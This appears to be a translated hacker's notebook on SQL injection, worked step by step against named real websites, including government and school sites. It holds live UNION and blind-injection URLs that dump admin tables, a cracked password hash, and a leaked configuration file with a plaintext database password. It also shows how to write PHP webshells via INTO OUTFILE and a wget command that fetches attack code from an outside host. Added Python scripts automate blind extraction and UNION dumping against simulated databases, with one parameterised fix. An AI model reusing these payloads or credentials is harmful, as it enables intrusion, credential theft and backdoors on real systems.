Fingerprinting the site's operating system, web server and so on: http://browserspy.dk/webserver.php
Making IE show detailed error messages (uncheck "Show friendly HTTP error messages" under Internet Options > Advanced, so the server's own error page is displayed instead of IE's generic one):
Before the change: (screenshot not included)
After the change: (screenshot not included)
TTL:
Default initial TTL values: Linux 64 or 255, Windows NT/2000/XP 128, Windows 98 32, UNIX hosts 255 (http://baike.baidu.com/view/2696.htm#2). Each router hop decrements the TTL by one, so round the value seen in a ping reply up to the nearest default before guessing the OS.
Finding injection points
Detection: append a single quote, or add and 1=1 / and 1=2 and compare the responses. The following error means the parameter is NOT injectable (the value is run through CInt() before it reaches the query, so any non-numeric input dies here):
http://www.chhuaxu.com/product.asp?cataid=319'
Microsoft VBScript runtime error '800a000d' Type mismatch: 'cint' /product.asp, line 60
This error means the parameter IS injectable (the quote reached the query and broke its syntax; the driver name also reveals an Access backend):
http://www.chhuaxu.com/product_show.asp?id=5106'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=5106''. /product_show.asp, line 52
http://www.chhuaxu.com/product_show.asp?id=5106%20and%20exists%20%28select%20[pwd]%20from%20[admin]%29
(i.e. id=5106 and exists (select [pwd] from [admin]): the page renders normally only if a table admin with a column pwd exists.)
Havij
Scans for injection points, login pages, tables, columns and so on. Other tools: 啊D and 明小子, Chinese tools that only target ASP sites.
Finding injection points with Google (switch to Chinese results):
inurl:admin intext:管理员登陆 (admin login)
intitle:管理员登录 (admin login)
site:test.com
Finding the site's admin backend
Guessing and scanning, inurl:robots.txt, Google search
Example: SQL-injecting a site
Injectable URL found: http://www.changli.gov.cn/depart/gtj/detail.php?id=463'
11 columns in total; positions 5, 6, 7 and 8 are displayed on the page
http://www.changli.gov.cn/depart/gtj/detail.php?id=463+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11
Database information:
version():5.1.54-community
database():changli
user():changli@localhost
Table names (0x6368616E676C69 is the hex of the database name changli; a hex literal needs no quotes):
http://www.changli.gov.cn/depart/gtj/detail.php?id=463+and+1=2+union+select+1,2,3,4,5,6,7,concat(group_concat(distinct+table_name)),9,10,11+from+information_schema.tables+where+table_schema=0x6368616E676C69
Result: cx_admin, cx_admin_nav, cx_admin_nav0908beifen, and so on
Column names (0x63785F61646D696E is the hex of cx_admin):
http://www.changli.gov.cn/depart/gtj/detail.php?id=463+and+1=2+union+select+1,2,3,4,5,6,7,concat(group_concat(distinct+column_name)),9,10,11+from+information_schema.columns+where+table_name=0x63785F61646D696E
Result: id, admin_name, admin_pw
Then dump the passwords the same way, selecting admin_name and admin_pw from cx_admin into the display positions.
General steps for manual injection
Guess the table name: and exists (select * from admin) -- no error means the guess is right.
Guess the column name: and exists (select username from admin)
Find the column count: order by 10 (raise the number until the page errors; the last value that works is the count)
Dump the password with a UNION: union select
For example:
?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin    if 5 and 6 appear in the page, positions 5 and 6 are the display positions
?id=1 and 1=2 union select 1,2,3,4,admin_name,admin_pwd,7,8,9,10 from admin    (the column count must match the 10 found above)
This dumps the username and password.
When a UNION query cannot be used (blind injection), use this method instead:
?id=1 and (select top 1 len(admin_name) from Admin) > 0    tests whether the value is longer than 0 characters; replace 0 with other numbers and try them one at a time
and (select top 1 asc(mid(admin_name,N,1)) from Admin) > 0    takes the Nth character of the value and compares its ASCII code (Access syntax; on MySQL use ascii(substring(admin_name,N,1)) with limit 1, on MSSQL ascii(substring(...)))
For example:
http://fc1885.com/display1_new.asp?id=108 and (select top 1 asc(mid(admin_name,1,1)) from Admin) > 90
The page renders normally, so the ASCII code of that character is greater than 90; narrowing down one value at a time gives 97, i.e. "a".
Then the second character:
http://fc1885.com/display1_new.asp?id=108 and (select top 1 asc(mid(admin_name,2,1)) from Admin) > 90
Narrowing down gives 100, i.e. "d", and so on.
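Trying values one at a time, as above, costs up to a hundred requests per character. The added example below (my code, not the page's) runs the same boolean-blind probes as a binary search: each request asks "is the value greater than mid?", so the length and every character are recovered in about eight requests each. The target is a constructed in-memory SQLite stand-in for display1_new.asp, so the Access functions from the write-up (top 1, asc, mid, len) are written per dialect; only the SQLite template is executed here, the Access and MySQL ones are included for reference. Table contents, the table name Admin and the columns are assumptions.

```python
import sqlite3

# Added example (not the page's code): boolean-blind extraction by binary
# search. The oracle is a simulated vulnerable page built on SQLite.

CHAR_GT = {
    "access": "(select top 1 asc(mid({col},{pos},1)) from {table}) > {val}",
    "mysql":  "(select ascii(substring({col},{pos},1)) from {table} limit 1) > {val}",
    "sqlite": "(select unicode(substr({col},{pos},1)) from {table} limit 1) > {val}",
}
LEN_GT = {
    "access": "(select top 1 len({col}) from {table}) > {val}",
    "mysql":  "(select length({col}) from {table} limit 1) > {val}",
    "sqlite": "(select length({col}) from {table} limit 1) > {val}",
}


class SimulatedTarget:
    """Stand-in for ?id=108: the parameter is concatenated into the query and
    the page renders 'normally' only when a row comes back. Data is constructed."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            create table news(id integer, title text);
            insert into news values (108, 'some article');
            create table Admin(admin_name text, admin_pw text);
            insert into Admin values ('admin', 'hmt009');
        """)

    def page_is_normal(self, id_param: str) -> bool:
        sql = "select title from news where id=" + id_param   # vulnerable on purpose
        try:
            return self.db.execute(sql).fetchone() is not None
        except sqlite3.Error:                                # broken SQL -> error page
            return False


def blind_extract(oracle, table, col, dialect="sqlite", base_id="108", max_len=64):
    """Recover the first row's value of `col` using only true/false answers.

    Each probe asks 'is the value > mid?'; the search converges on the smallest
    value for which the answer is false, which is the value itself.
    Returns the recovered string and the number of requests used."""
    requests = 0

    def ask(condition: str) -> bool:
        nonlocal requests
        requests += 1
        return oracle(f"{base_id} and {condition}")

    def search(template: str, hi: int, **fields) -> int:
        lo = 0
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(template.format(val=mid, **fields)):
                lo = mid + 1          # value > mid
            else:
                hi = mid              # value <= mid
        return lo

    length = search(LEN_GT[dialect], max_len, col=col, table=table)
    chars = [chr(search(CHAR_GT[dialect], 255, col=col, table=table, pos=pos))
             for pos in range(1, length + 1)]
    return "".join(chars), requests


if __name__ == "__main__":
    target = SimulatedTarget()
    print(blind_extract(target.page_is_normal, "Admin", "admin_name"))
```

Against a real site, oracle would be a function that sends the request and returns whether the response looks like the normal page; the search logic does not change.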
More advanced manual injection
http://www.hkct.edu.hk/news_detail.php?id=164 order by 11 returns results, while http://www.hkct.edu.hk/news_detail.php?id=164 order by 12 errors,
so there are 11 columns in total.
Find the display positions
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11
Positions 4, 5 and 7 are displayed
Database information
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,version(),database(),6,7,8,9,10,11
Digging further into the database (the hex of the database name can be produced with the 小葵 multi-purpose converter; here 0x726576616D70, i.e. "revamp"). Template, with the placeholder to be replaced by the hex of the database name:
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,table_name from (select * from information_schema.tables where table_schema=<hex of database name> order by table_schema limit 0,1)t limit 1--
(The inner limit selects one row at a given offset and the outer limit 1 keeps it; later requests step the offset by one. limit k,1 is sufficient, since the second number is a row count, not an end index. Where group_concat() is available, as in the previous example, one request returns all the names.)
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10,11 from (select * from information_schema.tables where table_schema=0x726576616D70 order by table_schema limit 0,1)t limit 1--
First table name: SeminarNode_seq
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10,11 from (select * from information_schema.tables where table_schema=0x726576616D70 order by table_schema limit 1,2)t limit 1--
Second table name: LinkAdvNode
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10,11 from (select * from information_schema.tables where table_schema=0x726576616D70 order by table_schema limit 2,3)t limit 1--
Third table name: AlbumNode
Keep incrementing the offset until:
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10,11 from (select * from information_schema.tables where table_schema=0x726576616D70 order by table_schema limit 35,36)t limit 1--
By this point these tables had been collected: News,AlbumNode_seq,SeminarNode_seq,LinkAdv,PrinBlogReply,HtmlPageNode_seq,Press,CourseTypeNode,NewsNode_seq,Banner,SeminarReg,LinkAdvNode,Register,Icons,PressNode,CourseTypeNode_seq,PageViews,Course,LinkAdvNode_seq,Album,Seminar,IconsNode,PressNode_seq,HtmlPage,PageViewsType,CourseNode,News,AlbumNode,SeminarNode,IconsNode_seq,PrinBlog,HtmlPageNode, Password,CourseNode_seq
Then, using the hex of the Password table (0x50617373776F7264), query its column names:
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10,11 from (select * from information_schema.columns where table_name=0x50617373776F7264 and table_schema=0x726576616D70 order by 1 limit 0,1)t limit 1--
First column: id
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10,11 from (select * from information_schema.columns where table_name=0x50617373776F7264 and table_schema=0x726576616D70 order by 1 limit 1,2)t limit 1--
Second column: loginName
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10,11 from (select * from information_schema.columns where table_name=0x50617373776F7264 and table_schema=0x726576616D70 order by 1 limit 2,3)t limit 1--
Third column: password
Keep going until every column is found: id,loginName,password,level,level_id,type_id,lastLogin,createDate,lastModDate
Check the concat of id:
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,concat(id),5,6,7,8,9,10,11 from Password
Returns: 41
Dump the password:
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,concat(loginName),5,6,concat(password),8,9,10,11 from Password
svtadmin
06a1c9549f34dd7132a7f0380282e085 (the MD5 hash; i.e. hmt009 once cracked)
The load_file() function
Google: intext:warning mysql_fetch_array /var/www/ -- found http://www.jawacz.com.ar/ficha_imprimir.php?id= with the error: /var/www/docs/jawacz.com.ar/htdocs/ficha_imprimir.php on line 52
Start: http://www.jawacz.com.ar/ficha_imprimir.php?id=1 order by 35 is where the errors begin, so there are 34 columns
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
Displayed: 3
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
Returns: uv1828@localhost
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
Returns: jawa_nuevo
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
Returns: 5.1.63
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
Returns: 5.1.63
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,@@basedir,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
Returns: / [installation path]
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,@@datadir,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
Returns: /var/lib/mysql/ [data directory]
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,load_file(<hex of the path>),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
Hex of /var/www/docs/jawacz.com.ar/htdocs/ficha_imprimir.php (it decodes back correctly): 2f7661722f7777772f646f63732f6a617761637a2e636f6d2e61722f6874646f63732f66696368615f696d7072696d69722e706870
This should have returned the file's contents, but it failed here. load_file() returns NULL when the MySQL account lacks the FILE privilege, when the mysqld process cannot read the file, when secure_file_priv restricts the directory, or when the file is larger than max_allowed_packet, so a failure does not mean the path is wrong.
Had it succeeded: if ficha_imprimir.php includes the database connection file, read that file the same way (its path hex-encoded), and its contents give the database username and password.
If a remote connection to the database fails, try phpMyAdmin. Once logged into the database, create a new database and a table, e.g. testtable with a column cmd:
插入: insert into testtable(cmd) values('<?php system($_REQUEST[cmd]);?>')
Then write its contents out to a file: select * from testtable into outfile '/var/www/docs/jawacz.com.ar/htdocs/cmd.php'
Visit this cmd.php to run Linux commands:
http://www.jawacz.com.ar/cmd.php?cmd=ls
http://www.jawacz.com.ar/cmd.php?cmd=wget http://www.linux0day.cn/2008.txt    downloads the attack code (its contents: https://gist.github.com/phoenixg/6475443)
http://www.jawacz.com.ar/cmd.php?cmd=mv 2008.txt test.php
Then visit test.php. Done.
If magic_quotes_gpc is off:
the path need not be hex-encoded; load_file('/var/www/target.php') outputs the file directly.
Next:
... union select 1,2,'<?php eval($_POST[cmd]);?>' into outfile '/var/www/hack.php'    the page returns an error, but try visiting the file anyway; if it is there, hack.php is the backdoor address. (into outfile also needs the FILE privilege, a directory writable by the mysqld user, and a file name that does not already exist.)
Then use the lanker one-liner backdoor client to access the data; code: https://gist.github.com/phoenixg/6475631
PHP/MySQL injection in practice 1
http://www.eduid.com/newsinfo.php?id=589'    blank page: there is an error, but it is not displayed
http://www.eduid.com/newsinfo.php?id=589 order by 1    if this works fine, order by can be used to count the columns
http://www.eduid.com/newsinfo.php?id=589 order by 14    14 columns in total
http://www.eduid.com/newsinfo.php?id=589 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14    shows 2 and 8; and 1=2 makes the original query match nothing
http://www.eduid.com/newsinfo.php?id=-589 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14    also shows 2 and 8; either works, id=-589 makes the original query match nothing too
Note: spaces can be replaced with +, otherwise the browser turns them into %20, which is hard to read; in MySQL a comment /**/ also works as whitespace, e.g.:
http://www.eduid.com/newsinfo.php?id=-589/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14
Database information:
http://www.eduid.com/newsinfo.php?id=-589+union+select+1,user(),3,4,5,6,7,version(),9,10,11,12,13,14
Returns: root@localhost, 5.1.41
http://www.eduid.com/newsinfo.php?id=-589+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14
Returns: four_bzh
Try reading the configuration (guessed path):
http://www.eduid.com/newsinfo.php?id=-589 union select 1,load_file('/srv/www/htdocs/newsinfo.php'),3,4,5,6,7,8,9,10,11,12,13,14
Error returned: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in E:\xampp\htdocs\edu\newsinfo.php on line 5
This reveals the real path: E:\xampp\htdocs\edu\newsinfo.php
Try the real path (convert it to hex with the 小葵 multi-purpose converter and put that into the query):
http://www.eduid.com/newsinfo.php?id=-589 union select 1,load_file('E:/xampp/htdocs/edu/newsinfo.php'),3,4,5,6,7,8,9,10,11,12,13,14
http://www.eduid.com/newsinfo.php?id=-589 union select 1,load_file(0x453A2F78616D70702F6874646F63732F6564752F6E657773696E666F2E706870),3,4,5,6,7,8,9,10,11,12,13,14
View the page source (the PHP tags are not rendered by the browser) to find:
<?php require('require/config.inc.php');
$id = $_GET['id'];  // untrusted input, never validated
$sql_news = "select * from s_news where n_id=$id";  // $id interpolated unquoted: the injection point
$result_news = mysql_query($sql_news);  // returns false when the injected SQL fails
$data_news = mysql_fetch_array($result_news);  // the "line 5" warning above comes from fetching on that false result
$class = $data_news['n_class'];
$small_class = $data_news['n_small_class'];
$nc_id = $data_news['n_class'];
?>
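The leaked snippet above is the whole vulnerability: an unquoted, unvalidated $id dropped into the query text. The following added example (my code, not from the page or the site) rebuilds that pattern on an in-memory SQLite database so the column-count, display-position and UNION steps used on this page can be run end to end, next to the fixed version that validates the type and binds a parameter. The table layouts, rows, the two-position page template and the credentials are all constructed; the PHP fix mentioned in the comment ((int) cast plus a prepared statement) is the equivalent on the real stack.

```python
import sqlite3

# Added example (not the page's code): "select * from s_news where n_id=$id"
# reproduced on SQLite, with the UNION attack and the parameterised fix.

SCHEMA = """
create table s_news(n_id integer, n_title text, n_class integer, n_small_class integer);
insert into s_news values (589, 'Expo news', 1, 2);
create table s_admin(id integer, username text, password text);
insert into s_admin values (1, 'admin', 'hunter2');
"""


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def newsinfo_vulnerable(db, id_param: str):
    # $sql_news="select * from s_news where n_id=$id";  -- string interpolation
    return db.execute("select * from s_news where n_id=" + id_param).fetchall()


def newsinfo_fixed(db, id_param: str):
    # Validate the type first, then bind; the value can never become SQL.
    # PHP equivalent: $id = (int)$_GET['id'] plus a PDO prepared statement.
    n_id = int(id_param)            # ValueError for "589 order by 5" and the like
    return db.execute("select * from s_news where n_id=?", (n_id,)).fetchall()


def render(rows) -> str:
    """The page template prints only the title and small_class columns
    (positions 2 and 4): these are the 'display positions' of the write-up."""
    if not rows:
        return ""
    row = rows[0]
    return f"{row[1]} | {row[3]}"


def count_columns(db, base_id="589", limit=32):
    """ORDER BY n fails as soon as n exceeds the number of selected columns."""
    for n in range(1, limit + 1):
        try:
            newsinfo_vulnerable(db, f"{base_id} order by {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def find_display_positions(db, ncols, base_id="589"):
    """id=-589 makes the original SELECT match nothing, so whatever the page
    renders comes from the UNION row of marker numbers."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    shown = render(newsinfo_vulnerable(db, f"-{base_id} union select {markers}"))
    return [i for i in range(1, ncols + 1) if str(i) in shown.split(" | ")]


def dump_admin(db, ncols, positions, base_id="589"):
    """Place username and password into the two display positions."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[positions[0] - 1] = "username"
    cols[positions[1] - 1] = "password"
    payload = f"-{base_id} union select {','.join(cols)} from s_admin"
    return render(newsinfo_vulnerable(db, payload))


if __name__ == "__main__":
    db = open_db()
    n = count_columns(db)
    pos = find_display_positions(db, n)
    print(n, pos, dump_admin(db, n, pos))
```

With the fixed function every payload on this page fails at int() before any SQL is built; with the vulnerable one the three helper calls reproduce the manual steps in a few lines.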
Now try writing out a file (convert <?php eval($_POST[cmd]);?> to hex with the 小葵 converter and put that into the query):
http://www.eduid.com/newsinfo.php?id=-589+union+select+1,'<?php eval($_POST[cmd]);?>',3,4,5,6,7,8,9,10,11,12,13,14+into+outfile+'E:\xampp\htdocs\edu\hack.php'
http://www.eduid.com/newsinfo.php?id=-589+union+select+1,0x3C3F706870206576616C28245F504F53545B636D645D293B3F3E,3,4,5,6,7,8,9,10,11,12,13,14+into+outfile+\'E:\xampp\htdocs\edu\hack.php\'
Both error out: the server has magic_quotes_gpc enabled, so the quotes around the outfile path are escaped and into outfile cannot be used (the file name must be a quoted string literal, which, unlike the payload, cannot be hex-encoded).
So, read the configuration file require/config.inc.php instead (convert E:/xampp/htdocs/edu/require/config.inc.php to hex with the 小葵 converter):
http://www.eduid.com/newsinfo.php?id=-589+union+select+1,2,3,4,5,6,7,load_file(0x453A2F78616D70702F6874646F63732F6564752F726571756972652F636F6E6669672E696E632E706870),9,10,11,12,13,14
View the page source to get the file's contents:
<?php
// Configuration file: basic variable settings
// Xinxin Shiji PHP development, version 1.0
$mysql_server_name="localhost";
$mysql_username="root";
$mysql_password="weilifei";
$mysql_database="four_bzh";
//------
$title="中国国际设计艺术博览会";//site title
//--------
require('function.php');
date_default_timezone_set('PRC');//change from Greenwich Mean Time
@$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password) or die("<font color=#ff0000>连接mysql数据库出错或者数据库没启动!</font>");//open the server connection
mysql_query("set names 'gbk'");//the key to fixing garbled text; use UTF8 on Linux
mysql_select_db($mysql_database,$conn);
$sql="select * from s_config";
$result=mysql_query($sql);
$data=@mysql_fetch_array($result);
?>
Then connect with a mysql client; success means the server accepts remote connections. Otherwise, try guessing the phpMyAdmin URL and logging in there.
Tried 114.112.55.10 (the IP of www.eduid.com) with the username and password above: failed. Tried phpMyAdmin: also failed.
Then probed with Havij 1.15: feeding it http://www.eduid.com/newsinfo.php?id=-589 dumped every table.
Logging into the backend address Havij found, http://www.eduid.com/admin/login.php, with the dumped username and password: success.
Finally, a webshell can be dropped the way described above: create a table and column in MySQL and write the data out to a file.
PHP/MySQL injection in practice 2
http://www.ahthedu.cn/include/web_content.php?id=589
Havij findings:
Host IP: 60.171.162.18
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.8
DB Server: MySQL
Selected Column Count is 22
Length of 'Current DB' is 6
Current DB: web_db
Or manually: 22 columns in total
http://www.ahthedu.cn/include/web_content.php?id=589 order by 23    (errors)
http://www.ahthedu.cn/include/web_content.php?id=589 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22    redirects to the IIS 404 page
http://www.ahthedu.cn/include/web_content.php?id=-589 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22    redirects to the IIS 404 page
The original notes attribute this to MySQL being older than version 5 (or to another DBMS; since Havij had identified MySQL, it is assumed to be MySQL 4). Note that UNION SELECT itself has worked since MySQL 4.0; what MySQL 4 lacks is information_schema (added in 5.0). A redirect to a 404 on a UNION is therefore at least as likely to be a WAF or custom error handling as an old server.
The site has other protections in place, so there are no further steps.
PHP/MySQL injection in practice 3
Probing for information:
http://www.xurichangsheng.com/newDetail.php?id=589 and 1=2 union select 1,user(),3,4,5,6    and so on
Version: 4.1.22-community-nt
Display positions: 2 and 6
Database: sq_bjxrcs
User: sq_bjxrcs@localhost
Havij findings:
Host IP: 175.41.28.90
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Keyword Found: content()
Injection type is Integer
DB Server: MySQL >=4.1
Selected Column Count is 6
Current DB: sq_bjxrcs
Error message:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\wwwroot\bjxrcs\wwwroot\libs\db_mysql.php on line 52
Absolute path:
D:\wwwroot\bjxrcs\wwwroot\libs\db_mysql.php
Try load_file():
http://www.xurichangsheng.com/newDetail.php?id=589 and 1=2 union select 1,load_file('D:/wwwroot/bjxrcs/wwwroot/libs/db_mysql.php'),3,4,5,6
http://www.xurichangsheng.com/newDetail.php?id=589 and 1=2 union select 1,load_file(0x443A2F777777726F6F742F626A787263732F777777726F6F742F6C6962732F64625F6D7973716C2E706870),3,4,5,6
The page source does not contain the expected content; it failed. Why? The usual causes are that sq_bjxrcs@localhost (clearly not root) lacks the FILE privilege, that the file is not readable by the account the MySQL service runs as, or that the file is larger than max_allowed_packet; load_file() returns NULL in all of these cases, and NULL renders as nothing. The 4.1 server is also old enough that the result encoding may not survive the page's charset handling, so check the raw response rather than only the rendered page.